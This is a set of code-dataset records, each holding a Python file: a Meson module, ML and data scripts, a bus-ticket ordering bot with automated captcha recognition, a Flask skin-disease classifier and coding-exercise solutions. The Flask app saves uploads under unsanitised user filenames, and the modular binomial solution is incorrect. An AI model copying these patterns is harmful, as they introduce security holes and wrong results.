else:\n form = PostForm(instance=post)\n return render(request, 'polls/post_edit.html', {'form': form})\n","sub_path":"polls/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"334188934","text":"# Copyright 2016 The Meson development team\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n\n# http://www.apache.org/licenses/LICENSE-2.0\n\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. 
import coredata, mesonlib, build\nimport sys\n\nclass I18nModule:\n\n def gettext(self, state, args, kwargs):\n if len(args) != 1:\n raise coredata.MesonException('Gettext requires one positional argument (package name).')\n packagename = args[0]\n languages = mesonlib.stringlistify(kwargs.get('languages', []))\n if len(languages) == 0:\n raise coredata.MesonException('List of languages empty.')\n datadirs = mesonlib.stringlistify(kwargs.get('data_dirs', []))\n extra_args = mesonlib.stringlistify(kwargs.get('args', []))\n\n pkg_arg = '--pkgname=' + packagename\n lang_arg = '--langs=' + '@@'.join(languages)\n datadirs = '--datadirs=' + ':'.join(datadirs) if datadirs else None\n extra_args = '--extra-args=' + '@@'.join(extra_args) if extra_args else None\n\n potargs = [state.environment.get_build_command(), '--internal', 'gettext', 'pot', pkg_arg]\n if datadirs:\n potargs.append(datadirs)\n if extra_args:\n potargs.append(extra_args)\n pottarget = build.RunTarget(packagename + '-pot', sys.executable, potargs, [], state.subdir)\n\n gmoargs = [state.environment.get_build_command(), '--internal', 'gettext', 'gen_gmo', lang_arg]\n gmotarget = build.RunTarget(packagename + '-gmo', sys.executable, gmoargs, [], state.subdir)\n\n updatepoargs = [state.environment.get_build_command(), '--internal', 'gettext', 'update_po', pkg_arg, lang_arg]\n if datadirs:\n updatepoargs.append(datadirs)\n if extra_args:\n updatepoargs.append(extra_args)\n updatepotarget = build.RunTarget(packagename + '-update-po', sys.executable, updatepoargs, [], state.subdir)\n\n installcmd = [sys.executable, state.environment.get_build_command(),\n '--internal', 'gettext', 'install',\n '--subdir=' + state.subdir,\n '--localedir=' + state.environment.coredata.get_builtin_option('localedir'),\n pkg_arg, lang_arg]\n iscript = build.InstallScript(installcmd)\n\n return [pottarget, gmotarget, iscript, updatepotarget]\n\ndef initialize():\n return I18nModule()\n","sub_path":"mesonbuild/modules/i18n.py","file_name":"i18n.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"614410186","text":"from sa.common import get_ms_ticker_names, find_small_cap_tickers\nfrom sa.tools.features import Features\nfrom sa.tools.returncalc import ReturnCalculator\nfrom sa.logger import LOGGER\n\nimport os\nimport numpy as np\n\nfrom sklearn.preprocessing import Imputer\n\nclass FeatureHelper():\n def __init__(self, session):\n self.dir_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'cache')\n self.file_path = os.path.join(self.dir_path, 'features.npz')\n self.sess = session\n self.ff = Features()\n\n def fetch_feature_data(self):\n if not os.path.isfile(self.file_path):\n self.generate_and_save_feature_data()\n\n npz = np.load(self.file_path)\n\n return tuple(npz[a] for a in ('train_data', 'train_targets', 'test_data', 'test_targets'))\n\n def fetch_binary_feature_data(self, p=None):\n train_data, train_targets, test_data, test_targets = self.fetch_feature_data()\n\n median = np.median(train_targets)\n print('meadian is ', median)\n train_targets = np.array([t >= median for t in train_targets])\n test_targets = np.array([t >= median for t in test_targets])\n\n return train_data, train_targets, test_data, test_targets\n\n def fetch_feature_tickers(self):\n npz = np.load(self.file_path)\n\n return npz['train_ticker_names'], npz['test_ticker_names']\n\n def screen_and_save_feature_data(self):\n train_ticker_names, test_ticker_names = 
self.fetch_feature_tickers()\n        train_data, train_targets, test_data, test_targets = self.fetch_feature_data()\n\n        tickers = set(find_small_cap_tickers(self.sess)) # finds ticker < 10m value\n        train_rm_indexes = []\n        for i, (ticker, target) in enumerate(zip(train_ticker_names, train_targets)):\n            if target > 10 or ticker in tickers:\n                train_rm_indexes.append(i)\n        test_rm_indexes = []\n        for i, (ticker, target) in enumerate(zip(test_ticker_names, test_targets)):\n            if target > 10 or ticker in tickers:\n                test_rm_indexes.append(i)\n\n        train_ticker_names = np.delete(train_ticker_names, train_rm_indexes, axis=0)\n        train_data = np.delete(train_data, train_rm_indexes, axis=0)\n        train_targets = np.delete(train_targets, train_rm_indexes, axis=0)\n        test_ticker_names = np.delete(test_ticker_names, test_rm_indexes, axis=0)\n        test_data = np.delete(test_data, test_rm_indexes, axis=0)\n        test_targets = np.delete(test_targets, test_rm_indexes, axis=0)\n\n        LOGGER.info(\"Saving file at: {}\".format(self.file_path))\n\n        np.savez(self.file_path,\n            train_data = train_data, train_targets = train_targets,\n            train_ticker_names = train_ticker_names, test_data = test_data,\n            test_targets = test_targets, test_ticker_names = test_ticker_names)\n\n    def fetch_feature_names(self):\n        return self.ff.ms_key_stats_cols\n\n    def generate_and_save_feature_data(self, independent=True):\n        # timedelta is used below for the fallback date gap but is not imported anywhere in this file\n        from datetime import timedelta\n\n        rc = ReturnCalculator()\n\n        ticker_names = sorted(get_ms_ticker_names(self.sess, \"TSX\"))\n        num_tickers = len(ticker_names)\n\n        train_data, train_targets = [], []\n        train_ticker_names = []\n        test_data, test_targets = [], []\n        test_ticker_names = []\n\n        imp = Imputer(missing_values='NaN', strategy='mean', axis=0)\n\n        for i, t in enumerate(ticker_names, 1):\n            LOGGER.info(\"[{:d}/{:d}] Working on {}...\".format(i, num_tickers, t))\n\n            dates = self.ff.ms_key_stats_date(self.sess, t)\n\n            if len(dates) < 1:\n                continue\n\n            date_gap = dates[1] - dates[0] if len(dates) > 2 else timedelta(days=365)\n            last_date = dates[-1]\n\n            rows = self.ff.ms_key_stats_data(self.sess, t)\n\n            if not independent:\n                # Window sliding for time series\n                empty_row = tuple((None,)) * len(rows[0])\n                new_rows = []\n                for i in range(len(rows)):\n                    first_part = rows[i-1] if i > 0 else empty_row\n                    second_part = rows[i]\n                    new_rows.append(first_part + second_part)\n                rows = new_rows\n\n            # Add the start date to the list of dates\n            return_dates = [dates[0] - date_gap] + dates\n\n            returns = rc.calculate_return_between_dates(t, return_dates)\n            for row, date, ret in zip(rows, dates, returns):\n                if ret is None: # if return date are out of range\n                    continue\n\n                if date == last_date:\n                    test_data.append(row)\n                    test_targets.append(ret)\n                    test_ticker_names.append(t)\n                else:\n                    train_data.append(row)\n                    train_targets.append(ret)\n                    train_ticker_names.append(t)\n\n        # Convert the python lists to numpy arrays and fill missing values\n        train_data = np.array(train_data, dtype=np.float)\n        imp = imp.fit(train_data)\n\n        train_ticker_names = np.array(train_ticker_names, dtype=np.str)\n        train_data = imp.transform(train_data)\n        train_targets = np.array(train_targets, dtype=np.float)\n        test_ticker_names = np.array(test_ticker_names, dtype=np.str)\n        test_data = imp.transform(np.array(test_data, dtype=np.float))\n        test_targets = np.array(test_targets, dtype=np.float)\n\n        if not os.path.exists(self.dir_path):\n            os.makedirs(self.dir_path)\n\n        LOGGER.info(\"Saving file at: {}\".format(self.file_path))\n\n        np.savez(self.file_path,\n            train_data = train_data, train_targets = train_targets,\n            train_ticker_names = 
train_ticker_names, test_data = test_data,\n test_targets = test_targets, test_ticker_names = test_ticker_names)\n\n\nif __name__ == \"__main__\":\n from sa.database import Session\n\n sess = Session()\n fc = FeatureHelper(sess)\n fc.generate_and_save_feature_data(independent=False)\n fc.screen_and_save_feature_data()\n\n","sub_path":"src/bots/feature_helper.py","file_name":"feature_helper.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"399040587","text":"from commom import cfg as ucasbus_cfg\nfrom crawl2.spider import *\nfrom crawl2.utils import *\nimport os, time, json\nimport numpy as np\nfrom tools import *\nimport threading\nfrom certcode.init import *\n\nname_re = re.compile(\n '
<li>你好,(.*?)</li>', re.S)\n\nurlcode_re = re.compile('toUtf8(.*?);')\n\ndef keep_alive(eric):\n    while True:\n        time.sleep(np.random.randint(300, 500))\n        if eric.finished:\n            return\n        ret = eric.check()\n        if not ret:\n            res, msg, data = auto_recognition_attemps(eric, attemps=5)\n            if res == 0 and data[0] == eric.realname:\n                pass\n            else:\n                eric._login = False\n\nclass Eric(object):\n    def __init__(self, username):\n        self.username = username\n        self.page_limit = ucasbus_cfg.page_limit\n        self._login = True\n        self.cache = Cache(ucasbus_cfg.cache_path)\n        self.route_list_cache = Cache(ucasbus_cfg.route_list_path)\n        self.user_cache = Cache(\\\n            os.path.join(ucasbus_cfg.users_path, username))\n        self.spider = Spider(encoding='utf-8')\n        self.load()\n        self.finished = False\n        self.keep_alive = threading.Thread(target=keep_alive, args=(self, ))\n        # self.keep_alive.start()\n\n    def finish(self):\n        self.save()\n        self.finished = True\n        # self.keep_alive.join()\n\n    def check(self):\n        response = self.spider.get('http://payment.ucas.ac.cn/NetWorkUI/showPublic')\n        if response:\n            return self.realname in response.text\n        return False\n\n    def load(self):\n        self.page = self.user_cache.load('page')\n        if not isinstance(self.page, list):\n            self.page = []\n        self.lock = self.user_cache.load('lock')\n        if self.lock == None or not isinstance(self.lock, bool):\n            self.lock = False\n        self.realname = self.user_cache.load('realname')\n        if not self.realname:\n            self.realname = 'Unknown'\n    \n    def query_remain(self, data):\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/queryRemainingSeats'\n        response = self.spider.post(url, data)\n        try:\n            return 'Remaining %s' % response.json()['returndata']['freeseat']\n        except:\n            return ''\n\n\n    def save(self):\n        self.user_cache.save(self.page, 'page')\n        self.user_cache.save(self.lock, 'lock')\n        self.user_cache.save(self.realname, 'realname')\n\n    def del_page(self, page):\n        if page >= 0 and page < len(self.page):\n            self.page[page]['active'] = False\n        return self.touch_page()\n\n    def new_page(self):\n        n = len(self.page)\n        for i in range(n):\n            if not self.page[i]['active']:\n                self.page[i] = {'status': 1, 'active': True}\n                return i\n        if n >= self.page_limit:\n            return -1\n        self.page.append({'status': 1, 'active': True})\n        return n\n\n    def touch_page(self, page=-1):\n        if page >= 0 and page < len(self.page) and \\\n                self.page[page]['active']:\n            return page\n        for i in range(len(self.page)):\n            if self.page[i]['active']:\n                return i\n        return self.new_page()\n\n    def get_certcode(self, prefix=False):# {{{\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/authImage'\n        name = hash_func('{}{}'.format(self.username, time.time()))+'.jpg'\n        certcode_path = os.path.join(ucasbus_cfg.static_folder, name)\n        response = self.spider.get(url)\n        if not response:\n            return ''\n        with open(certcode_path, 'wb') as f:\n            f.write(response.content)\n        return certcode_path if prefix else name\n    # }}}\n    def login(self, certcode):# {{{\n        msg = []\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/fontuserLogin'\n        data = self.user_cache.load('login')\n        data['checkCode'] = certcode\n        response = self.spider.post(url, data=data)\n\n        if not response:\n            msg += ['[ERR] Login failed, server did not respond.']\n            return 1, msg, None\n\n        name = name_re.findall(response.text)\n        if len(name) == 0:\n            msg += ['[ERR] Login failed, incorrect information.']\n            return 9, msg, None\n        else:\n            name = name[0]\n        msg += ['[SUC] %s logged in successfully!' 
% name]\n        return 0, msg, [name]\n    # }}}\n    def get_route(self, date, cache):# {{{\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/queryBusByDate'\n        route_list = self.route_list_cache.load(date)\n        msg = []\n        if not route_list or not cache:\n            data = {\n                'bookingdate': date,\n                'factorycode': 'R001',\n            }\n            response = self.spider.post(url, data=data)\n            if not response:\n                msg += ['[ERR] Failed to get routes, server did not respond.']\n                return 1, msg, None\n            try:\n                data = response.json()\n            except:\n                msg += ['[ERR] Failed to get routes, response could not be parsed as JSON.']\n                return 3, msg, None\n            try: \n                route_list = data['routelist']\n            except:\n                msg += ['[ERR] Failed to get routes, routelist not found.']\n                msg += ['[ERR] json = {}'.format(data)]\n                return 4, msg, None\n\n            self.route_list_cache.save(route_list, date)\n        return 0, msg, [route_list]\n    # }}}\n    def calc_time(self, *, \\\n            delta=ucasbus_cfg.delta, timezone=8, debug=None):# {{{\n        cur = time.time()\n        if debug:\n            return debug + cur\n        t = 18 * 3600 + delta - (cur + timezone * 3600) % 86400\n        if t < 0:\n            t += 86400\n        return int(t + cur)\n    # }}}\n    def check_realname(self, step, response):# {{{\n        msg = []\n        data = name_re.findall(response.text)\n        if len(data) == 1 and data[0] == self.realname:\n            return 0, msg\n        else:\n            names = json.dumps(data)\n            msg += ['[ERR] #{}: \'{}\' does not match user {}'.format(step, names, self.realname)]\n            return step * 10 + 2, msg\n    # }}}\n    def send_order(self, route, date):# {{{\n        msg = []\n        data = {\n            'routecode': route, # You need change\n            'payAmt': '6.00',\n            'bookingdate': date, # You need change\n            'payProjectId': '4', \n            'tel': self.user_cache.load('tel'),\n            'factorycode': 'R001',\n        }\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/reservedBusCreateOrder'\n        response = self.spider.post(url, data)\n\n        if not response:\n            msg += ['[ERR] #1: server did not respond.']\n            return 11, msg, None\n        try:\n            information = response.json()\n        except:\n            msg += ['[ERR] #1: response could not be parsed as JSON.']\n            return 13, msg, None\n\n        try:\n            ret = information['returncode']\n            orderno = information['payOrderTrade']['orderno']\n            msg += ['[SUC] #1: got order number [{}], order info: {}, {}, {}'.format(orderno, data['bookingdate'][0], data['routecode'][0], data['tel'])]\n            return 0, msg, [orderno]\n        except:\n            msg += ['[ERR] #1: returncode or payOrderTrade->orderno field not found!']\n            msg += ['[ERR] #1: json={}'.format(information)]\n            return 14, msg, None\n\n        msg += ['[ERR] step #1: json={}'.format(information)]\n        return 19, msg, None\n    # }}}\n    def send_orderno(self, orderno):# {{{\n        msg = []\n        data = {\n            'orderno': orderno,\n            'orderamt': '6.00',\n            'payType': '03',\n            'mess': '',\n            'start_limittxtime': '',\n            'end_limittxtime': '',\n        }\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/onlinePay'\n        response = self.spider.post(url, data=data)\n\n        if not response:\n            msg += ['[ERR] #2: server did not respond.']\n            return 21, msg, None\n        \n        ret, log = self.check_realname(2, response)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n        # msg += ['[SUC] #2: order sent successfully: {}!'.format(orderno)]\n        return 0, msg, None\n    # }}}\n    def request_wechat_urlcode(self, orderno):# {{{\n        msg = []\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/weixinPayAction?orderno=%s'%orderno\n        response = self.spider.get(url)\n\n        if not response:\n            msg += ['[ERR] #3: server did not respond!']\n            return 31, msg, None\n\n        ret, log = self.check_realname(3, response)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n\n        try:\n            urlcode = urlcode_re.findall(response.text)[0][2:-2]\n        except:\n            msg += ['[ERR] #3: urlcode field missing!']\n            return 35, msg, None\n        msg += ['[SUC] #3: successfully got urlcode from order [{}]: [{}]!'.format(orderno, urlcode)]\n        return 0, msg, [urlcode]\n    # }}}\n    def get_ucas_qrcode(self, 
urlcode):# {{{\n        msg = []\n        data = {\n            'msgCode': 'SUCCESS',\n            'weixinMessage': '??',\n            'urlCode': urlcode,\n            'key': 'TkVUV09SS1BBWWtleQ==',\n        }\n        url = 'http://payment.ucas.ac.cn/NetWorkUI/weiXinQRCode?'\n        for key, value in data.items():\n            url = url + key + '=' + value + '&'\n        response = self.spider.get(url)\n\n        if not response:\n            msg += ['[ERR] #4: server did not respond!']\n            return 41, msg, None\n\n        ret, log = self.check_realname(4, response)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n\n        text = response.text.replace('src=\"/NetWork', 'src=\"http://payment.ucas.ac.cn/NetWork')\n        msg += ['[SUC] QR code generated successfully from urlcode [{}]!'.format(urlcode)]\n        return 0, msg, [text]\n    # }}}\n    def buy(self, route, date):# {{{\n        msg = ['[LOG] Starting ticket purchase.']\n        '''\n        send order\n        '''\n        ret, log, data = self.send_order(route, date)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n        orderno = data[0]\n\n\n        ret, log, data = self.send_orderno(orderno)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n\n        \n        ret, log, data = self.request_wechat_urlcode(orderno)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n        urlcode = data[0]\n\n        ret, log, data = self.get_ucas_qrcode(urlcode)\n        msg += log\n        if ret != 0:\n            return ret, msg, None\n        html = data[0]\n\n        return 0, msg, [urlcode]\n    # }}}\n","sub_path":"eric.py","file_name":"eric.py","file_ext":"py","file_size_in_byte":10775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"219192539","text":"import time\nimport sys\ninput = sys.stdin.readline\n\nn, k = list(map(int, input().split()))\ndiv = 1000000007\n\ndef is_over(num):\n    if(num >= div):\n        return True\n    return False\n\ndef get_div(num):\n    return num % div\n\ndef get_process(num1, num2):\n    if(is_over(num1)):\n        num1 = get_div(num1)\n    return num1 * num2\n\ndef get_result():\n    up = n\n    bottom = k\n    for i in range(1, k):\n        up = get_process(up, up-i)\n        bottom = get_process(bottom, bottom-i)\n\n    result = up//bottom\n    if(is_over(result)):\n        return get_div(result)\n\n    return get_div(result)\n\ns = time.time()\nprint(get_result())\nprint(time.time() - s)","sub_path":"by date/2021.03.15/11401.py","file_name":"11401.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"289632259","text":"import os\nimport subprocess\nimport shlex\nimport sys\nimport time\nimport logging\nfrom watchdog.observers import Observer\nfrom watchdog.events import PatternMatchingEventHandler\nimport shutil\n\nDEVELOPMENT_DIR = \"/Users/Jamie/Google Drive/CS4/WebTech/development/html/\"\nPRODUCTION_DIR = \"/Users/Jamie/Google Drive/CS4/WebTech/\"\n\ndef errorBeep():\n    # terminal alert\n    print('\\a')\n    # audible alert\n    duration = 0.2 # second\n    freq = 440 # Hz\n    os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq))\n\ndef successBeep():\n    # terminal alert\n    print('\\a')\n    # audible alert\n    duration = 0.05 # second\n    freq0 = 600 # Hz\n    freq1 = 650 # Hz\n    os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq0))\n    os.system('play --no-show-progress --null --channels 1 synth %s sine %f' % (duration, freq1))\n\n\nclass vnuValidation(PatternMatchingEventHandler):\n\n    def extractTargetPath(self, event):\n        if event.event_type == 'moved':\n            return event.dest_path\n        else:\n            return event.src_path\n\n    def runValidation(self, event):\n        target_file = os.path.split(self.extractTargetPath(event)) [1]\n\n\n        # new stuff\n        target_file_path = 
self.extractTargetPath(event)\n splits = target_file_path.split('/')\n mirror_file_path = '/'.join(splits[8:])\n # new stuff\n\n\n # run validation\n target_path = \"/Users/Jamie/Google\\ Drive/CS4/WebTech/development/html/\" + mirror_file_path\n arg_str = \"java -jar /Users/Jamie/Google\\ Drive/CS4/WebTech/validation/dist/vnu.jar \" + target_path\n args = shlex.split(arg_str)\n p_vnu = subprocess.run(args, stderr=subprocess.PIPE)\n console_output = p_vnu.stderr.decode('utf-8')\n\n if len(console_output) == 0:\n # HTML passed - copy to public dir\n source_path = DEVELOPMENT_DIR + mirror_file_path\n destination_path = PRODUCTION_DIR +mirror_file_path\n shutil.copyfile(source_path, destination_path)\n print(\"Pass: %s\" %(target_file), '\\n')\n successBeep()\n else:\n # HTML failed\n errorBeep()\n print(\"Error in: %s\" %(target_file),'\\n')\n print(console_output)\n\n\n def on_created(self, event):\n self.runValidation(event)\n\n\n def on_modified(self, event):\n self.runValidation(event)\n\n def on_moved(self, event):\n self.runValidation(event)\n\n\nif __name__ == \"__main__\":\n logging.basicConfig(level=logging.INFO,\n format='%(asctime)s - %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S')\n path = sys.argv[1] if len(sys.argv) > 1 else DEVELOPMENT_DIR\n\n event_handler = vnuValidation(patterns=[\"*.html\"], ignore_patterns=[], ignore_directories=False)\n\n observer = Observer()\n observer.schedule(event_handler, path, recursive=True)\n observer.start()\n try:\n while True:\n time.sleep(1)\n except KeyboardInterrupt:\n observer.stop()\n observer.join()\n","sub_path":"vnu_automater.py","file_name":"vnu_automater.py","file_ext":"py","file_size_in_byte":3087,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"} +{"seq_id":"495503408","text":"from flask import Flask, render_template, request\r\nimport os\r\nfrom PIL import Image\r\n\r\nfrom tensorflow.keras.models import load_model\r\nfrom tensorflow.keras.preprocessing import image\r\nimport numpy as np\r\nimport tensorflow as tf\r\n\r\napp = Flask(__name__)\r\nimage_folder = os.path.join('static', 'images')\r\napp.config[\"UPLOAD_FOLDER\"] = image_folder\r\n\r\ndic = {0: 'acne-and-rosacea', 1: 'atopic-dermatitis', 2: 'eczema', 3: 'herpes-zoster', 4: 'lichen-planus', 5: 'nail-fungus', 6: 'other',7: 'psoriasis',8: 'tinea',9: 'urticaria'}\r\ndic1 = {0: 'static/data/0Mụn trứng cá/dinh nghia.PNG', 1: 'static/data/1Viêm da cơ địa/dinhnghia.PNG',\r\n 2: 'static/data/2Chàm/dinhnghia.PNG', 3: 'static/data/3Zona/dinhnghia.PNG',\r\n 4: 'static/data/4Lichen phẳng/dinhnghia.PNG', 5:'static/data/5Nấm móng/dinhnghia.PNG',\r\n 6: 'static/data/6Bệnh khác/dinhnghia.PNG', 7: 'static/data/7Vảy nến/dinhnghia.PNG',\r\n 8: 'static/data/8Nấm da đầu/dinhnghia.PNG', 9: 'static/data/9Mề đay/dinhnghia.PNG' }\r\n\r\ndic2 = {0: 'static/data/0Mụn trứng cá/tuvan.PNG', 1: 'static/data/1Viêm da cơ địa/tuvan.PNG',\r\n 2: 'static/data/2Chàm/tuvan.PNG', 3: 'static/data/3Zona/tuvan.PNG',\r\n 4: 'static/data/4Lichen phẳng/tuvan.PNG', 5:'static/data/5Nấm móng/tuvan.PNG',\r\n 6: 'static/data/6Bệnh khác/tuvan.PNG', 7: 'static/data/7Vảy nến/tuvan.PNG',\r\n 8: 'static/data/8Nấm da đầu/tuvan.PNG', 9: 'static/data/9Mề đay/tuvan.PNG' }\r\n\r\nmodel = load_model('resnet50.h5')\r\nmodel.make_predict_function()\r\n\r\n@app.route('/', methods=['GET'])\r\ndef home():\r\n return render_template('AIMed1.html')\r\n\r\n@app.route('/', methods=['POST'])\r\ndef predict():\r\n # predicting images\r\n imagefile = request.files['imagefile']\r\n image_path = 
'static/images/' + imagefile.filename\r\n    imagefile.save(image_path)\r\n\r\n    img = image.load_img(image_path, target_size=(224, 224))\r\n    x = image.img_to_array(img)/255.0\r\n    x = np.expand_dims(x, axis=0)\r\n\r\n    classes = model.predict(x)\r\n    result = np.argmax((classes[0]))\r\n    pic = os.path.join(app.config['UPLOAD_FOLDER'], imagefile.filename)\r\n    print(classes[0])\r\n    print(tf.nn.sigmoid(classes[0]))\r\n    print(result)\r\n    print(dic[result])\r\n\r\n    contents = Image.open('{}'.format(dic2[result]))\r\n\r\n    return render_template('AIMed1.html', user_image=pic,\r\n                           prediction_text='{}'.format(dic[result]),\r\n                           definition_image='{}'.format(dic1[result]),\r\n                           advice_image='{}'.format(dic2[result]))\r\n\r\nif __name__ == '__main__':\r\n    app.run()\r\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2623,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"212134976","text":"# -*- coding: utf-8 -*-\n\"\"\"Stochastic Gradient Descent\"\"\"\n\nimport numpy as np\nimport os\nimport sys\n\ncwd = os.getcwd()\nsys.path.append(cwd)\n\nfrom costs import *\n\n\ndef compute_stoch_gradient_mse(y, tx, w):\n    \"\"\"Compute a stochastic gradient from just few examples n and their corresponding y_n labels.\"\"\"\n    n, d = tx.shape\n\n    e = y - tx.dot(w)\n\n    return -tx.T.dot(e) / n\n\n\ndef batch_iter(y, tx, batch_size, num_batches=1, shuffle=True):\n    \"\"\"\n    Generate a minibatch iterator for a dataset.\n    Takes as input two iterables (here the output desired values 'y' and the input data 'tx')\n    Outputs an iterator which gives mini-batches of `batch_size` matching elements from `y` and `tx`.\n    Data can be randomly shuffled to avoid ordering in the original data messing with the randomness of the minibatches.\n    Example of use :\n    for minibatch_y, minibatch_tx in batch_iter(y, tx, 32):\n        <DO-SOMETHING>\n    \"\"\"\n    data_size = len(y)\n\n    if shuffle:\n        shuffle_indices = np.random.permutation(np.arange(data_size))\n        shuffled_y = y[shuffle_indices]\n        shuffled_tx = tx[shuffle_indices]\n    else:\n        shuffled_y = y\n        shuffled_tx = tx\n    for batch_num in range(num_batches):\n        start_index = batch_num * batch_size\n        end_index = min((batch_num + 1) * batch_size, data_size)\n        if start_index != end_index:\n            yield shuffled_y[start_index:end_index], shuffled_tx[start_index:end_index]\n\n\ndef stochastic_gradient_descent_mse(y, tx, initial_w, batch_size, max_iters, gamma):\n    \"\"\"Stochastic gradient descent algorithm.\"\"\"\n    n,d = tx.shape\n\n    ws = [initial_w]\n    initial_loss = compute_loss_mse(y, tx, initial_w)\n    losses = [initial_loss]\n\n    w = initial_w\n    n_iter = 0\n\n    for batch_y, batch_tx in batch_iter(y, tx, batch_size, max_iters):\n        # Compute gradient for current batch\n        gradient = compute_stoch_gradient_mse(batch_y, batch_tx, w)\n\n        # Update model parameters\n        w = w - gamma * gradient\n\n        # Compute new loss\n        loss = compute_loss_mse(y, tx, w)\n\n        # Store w and loss\n        ws.append(w)\n        losses.append(loss)\n\n        print(\"Stochastic GD({bi}/{ti}): loss={l}, w0={w0}, w1={w1}\".format(\n            bi=n_iter, ti=max_iters - 1, l=loss, w0=w[0], w1=w[1]))\n\n        n_iter += 1\n\n    return losses, ws","sub_path":"labs/ex02/template/stochastic_gradient_descent.py","file_name":"stochastic_gradient_descent.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"81725380","text":"import wikipedia\nimport re\nimport os\nimport csv\n\nclass Wikipedia:\n\tdef __init__(self):\n\t\tpass\n\n\tdef 
search(self, query):\n\t\t''' Wikipedia search function '''\n\t\t# try catch faulty queries, or queries resulting in disambiguation errors. \n\t\tprint('Wikipedia search in progress ...')\n\t\ttext = []  # default so the final return is defined even if the lookup fails\n\t\ttry: \n\t\t\tobj = wikipedia.page(wikipedia.search(query)[0])\n\t\t\ttext = obj.content\n\t\t\ttext = text.split('. ')\n\t\t\ttext = [[' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", sentence).split())] for sentence in text]\n\t\t\treturn text\n\t\texcept:\n\t\t\tprint('query error - try a more specific query')\n\t\t\tprint('possible that a wikipedia page pertaining to this query does not exist.')\n\t\tprint('Wikipedia search completed \\n')\n\t\treturn text\n\n\tdef buildCsv(self, wikiText, filename):\n\t\tprint('Writing %s ...' % (filename + '_cleaned' + '.csv'))\n\t\tif not os.path.exists('../data/'):\n\t\t\tos.makedirs('../data/')\n\n\t\tif not os.path.exists('../data/' + filename + '_cleaned' + '.csv'):\n\t\t\tf = open('../data/' + filename + '_cleaned' + '.csv', 'w')\n\t\t\tf.close()\n\n\t\twith open('../data/' + filename + '_cleaned' + '.csv', 'w', newline='') as f:\n\t\t\twriter = csv.writer(f)\n\t\t\twriter.writerows(wikiText)\n\t\tprint('%s written to /data \\n' % (filename + '_cleaned' + '.csv'))","sub_path":"src/wiki.py","file_name":"wiki.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
+{"seq_id":"477005048","text":"import sys\nclass Solution(object):\n    def maxProfit(self, k, prices):\n        \"\"\"\n        :type k: int\n        :type prices: List[int]\n        :rtype: int\n        \"\"\"\n        n = len(prices)\n        if k == 0 or n == 0: return 0\n        if k < n / 2:\n            sells = [0] * k\n            holds = [-sys.maxint] * k\n            # print n, k\n            for p in prices:\n                for j in range(k-1,0,-1):\n                    sells[j] = max(sells[j], holds[j] + p)\n                    holds[j] = max(holds[j], sells[j-1] - p)\n                sells[0] = max(sells[0], holds[0] + p)\n                holds[0] = max(holds[0], -p)\n            return sells[-1]\n        else:\n            profit = 0\n            for i in range(1, n):\n                if prices[i] > prices[i-1]:\n                    profit += prices[i] - prices[i-1]\n            return profit\n    \n    \n    ","sub_path":"python/leetcode/state_machine/188_Best_Time_to_Buy_and_Sell_Stock_IV.py","file_name":"188_Best_Time_to_Buy_and_Sell_Stock_IV.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"27"}
